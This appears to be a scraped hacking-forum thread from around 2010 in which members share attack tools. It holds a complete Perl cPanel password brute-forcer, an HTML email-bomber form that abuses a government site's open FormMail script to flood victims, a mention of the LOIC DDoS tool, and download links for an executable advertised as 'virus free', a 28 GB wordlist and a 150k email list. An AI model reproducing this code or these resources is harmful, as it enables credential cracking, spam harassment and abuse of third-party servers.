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  1. aHR0cDovL3d3dy5tdWx0aXVwbG9hZC5jb20vMVpLV jFSV0ROOQ what kind of freaking hash is thsi ?
  2. l33tz

    {#} Loic {#}

    Anonymous operation is using loic..
  3. It's working and there are no duplicates... It's meaned for dictionary attacts
  4. exista cateva trucuri în Perl
  5. [Email Checker] [screen Shot] [Download Link] http://rapidshare.com/files/403049753/mailcheck.rar.html [Virus FREE] File Info Report date: 2010-06-26 22:23:29 (GMT 1) File name: mailcheck.exe File size: 52224 bytes MD5 Hash: ab6de9549a591f581ae822750f111476 SHA1 Hash: 8f437d0465440341fe6ed84fbfe54a605ac652ec Detection rate: 0 on 16 (0%) Status: CLEAN Detections a-squared - Avast - AVG - Avira AntiVir - BitDefender - ClamAV - Comodo - Dr.Web - F-PROT6 - G-Data - Ikarus T3 - Kaspersky - NOD32 - Panda - TrendMicro - VBA32 - Scan report generated by NoVirusThanks.org
  6. <BODY BGCOLOR="#DBEAF5"><center> <h2>( FAKE EMAILER / SPAMMER )</h2> <form name=OcDuR action=http://www.lcsd.gov.hk/cgi-bin/formmail/FormMail.pl method=post> <center><input type=text value="Email To" name=recipient><input type=text value=Subject name=subject><input type=text value="Email From" name=realname><br><br><textarea cols=52 rows=10 name=" ">Your Under A Spam Attack !</textarea></br><br> <input type="submit" value = "Send Email To Victim" /> </form></br></center><input type=hidden value="EMAIL SENT ©OcDuR" name=title> </form> Note: Email From Needs To Be On The Victims Contacts List or It Will Send To Junk Folder.<br> To Bomb The Account Simply Click Back An Hit Send Email Again. <STYLE type="text/css"> <!-- BODY { scrollbar-face-color:DBEAF5; scrollbar-highlight-color:DBEAF5; scrollbar-3dlight-color:DBEAF5; scrollbar-darkshadow-color:DBEAF5; scrollbar-shadow-color:DBEAF5; scrollbar-arrow-color:DBEAF5; scrollbar-track-color:DBEAF5; } --> </style> <script language="JavaScript"> statuss(); function statuss() { window.status = "Made by Macedonian Security Crew/"; setTimeout("statuss(1)", 2); } </script> <center> Made by Macedonian Security Crew
  7. #!/usr/bin/perl # Cpanel Password Brute Forcer # ---------------------------- # (c)oded By Macedonian Security Crew # Perl Version ( low speed ) # Oerginal Advisory # use IO::Socket; use LWP::Simple; use MIME::Base64; $host = $ARGV[0]; $user = $ARGV[1]; $port = $ARGV[2]; $list = $ARGV[3]; $file = $ARGV[4]; $url = "http://".$host.":".$port; if(@ARGV < 3){ print q( ############################################################### # Cpanel Password Brute Force Tool # ############################################################### # usage : cpanel.pl [HOST] [User] [PORT][list] [File] # #-------------------------------------------------------------# # [Host] : victim Host (simorgh-ev.com) # # [User] : User Name (demo) # # [PORT] : Port of Cpanel (2082) # #[list] : File Of password list (list.txt) # # [File] : file for save password (password.txt) # # # ############################################################### # (c)oded By Macedonian Security Crew # ############################################################### );exit;} headx(); $numstart = "-1"; sub headx() { print q( ############################################################### # Cpanel Password Brute Force Tool # # (c)oded By Macedonian Security Crew # ############################################################### ); open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; @PASSWORDS = <PASSFILE>; close PASSFILE; foreach my $P (@PASSWORDS) { chomp $P; $passwd = $P; print " [~] Try Password : $passwd "; &brut; }; } sub brut() { $authx = encode_base64($user.":".$passwd); print $authx; my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " [-] Can not connect to the host"; print $sock "GET / HTTP/1.1 "; print $sock "Authorization: Basic $authx "; print $sock "Connection: Close "; read $sock, $answer, 128; close($sock); if ($answer =~ /Moved/) { print " [~] PASSWORD FOUND : $passwd "; exit(); } }
  8. [28 GB Wordlist] [Download] http://rapidshare.com/files/290751839/28GBwordlist.rar.html
  9. Mirror... http://rapidshare.com/files/353494010/badijala.com_150k_email_list.txt.html
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